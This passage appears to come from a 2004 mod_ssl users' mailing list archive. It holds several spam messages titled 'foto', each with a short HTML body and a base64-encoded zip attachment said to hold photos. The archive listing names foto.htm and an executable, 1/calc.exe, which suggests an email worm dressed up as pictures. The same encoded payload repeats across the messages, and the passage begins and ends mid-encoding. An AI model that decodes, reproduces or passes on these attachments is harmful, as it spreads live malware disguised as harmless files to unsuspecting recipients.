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
UEsFBgAAAAADAAMAngAAABoRAAAAAA==

----------geebgzdmawtupbyhzfok--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep  1 13:01:11 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 2DE1CA8963; Wed,  1 Sep 2004 13:01:11 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from moya-gelezka.net (80.178.189.110.forward.012.net.il [80.178.189.110])
	by master.modssl.org (Postfix) with SMTP id B4E04A893D
	for ; Wed,  1 Sep 2004 13:01:04 +0200 (CEST)
Date: Wed, 01 Sep 2004 13:59:12 +0200
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------ksdxrtymchtdanfirnys"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------ksdxrtymchtdanfirnys
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------ksdxrtymchtdanfirnys
Content-Type: application/octet-stream; name="fotos.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="fotos.zip"

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
UEsFBgAAAAADAAMAngAAABoRAAAAAA==

----------ksdxrtymchtdanfirnys--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep  1 13:15:21 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 5105CA8A79; Wed,  1 Sep 2004 13:15:21 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from xpw-llambert.net (pcp08362819pcs.lndsd201.pa.comcast.net [69.136.75.200])
	by master.modssl.org (Postfix) with SMTP id 9FBDDA893D
	for ; Wed,  1 Sep 2004 13:15:12 +0200 (CEST)
Date: Wed, 01 Sep 2004 07:15:17 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------psrnrtjvqutxarnhpscq"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------psrnrtjvqutxarnhpscq
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------psrnrtjvqutxarnhpscq
Content-Type: application/octet-stream; name="foto.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="foto.zip"

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
